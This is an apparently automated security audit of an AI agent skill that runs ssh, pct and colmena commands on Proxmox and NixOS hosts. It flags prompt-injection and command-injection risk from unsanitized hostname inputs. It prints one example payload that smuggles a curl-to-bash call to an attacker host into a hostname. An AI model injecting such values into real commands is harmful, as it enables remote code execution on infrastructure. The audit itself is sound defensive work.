infrastructure
Warn
Audited by Gen Agent Trust Hub on Feb 21, 2026
Risk Level: MEDIUM
COMMAND_EXECUTION, PROMPT_INJECTION
Full Analysis
- COMMAND_EXECUTION (MEDIUM): The skill is designed to perform administrative actions on remote infrastructure, which involves high-risk operations.
  - It utilizes `ssh` to execute commands on Proxmox hosts, such as `pct start`, `pct stop`, and `pct exec` for container management.
  - It uses `colmena` for system-wide NixOS deployments, which can modify server configurations and services.
  - Access to `systemctl` and `journalctl` allows for service state manipulation and log retrieval across the cluster.
- PROMPT_INJECTION (LOW): The skill is vulnerable to indirect prompt injection (Category 8) due to the way it constructs shell commands from variables.
  - Ingestion points: The skill relies on user-provided values for `<hostname>`, `<vmid>`, `<proxmox-host>`, and `<service>`, as seen in `SKILL.md` and `references/host-mapping.md`.
  - Boundary markers: There are no explicit boundary markers or instructions to the agent to sanitize these inputs before embedding them into shell strings.
  - Capability inventory: The skill possesses extensive capabilities including remote command execution (`ssh`), container orchestration (`pct`), and deployment tooling (`colmena`).
  - Sanitization: No sanitization or validation logic is documented. An attacker could potentially provide a malicious hostname (e.g., `"host; curl attacker.com/script | bash"`) to trigger unintended command execution.
Audit Metadata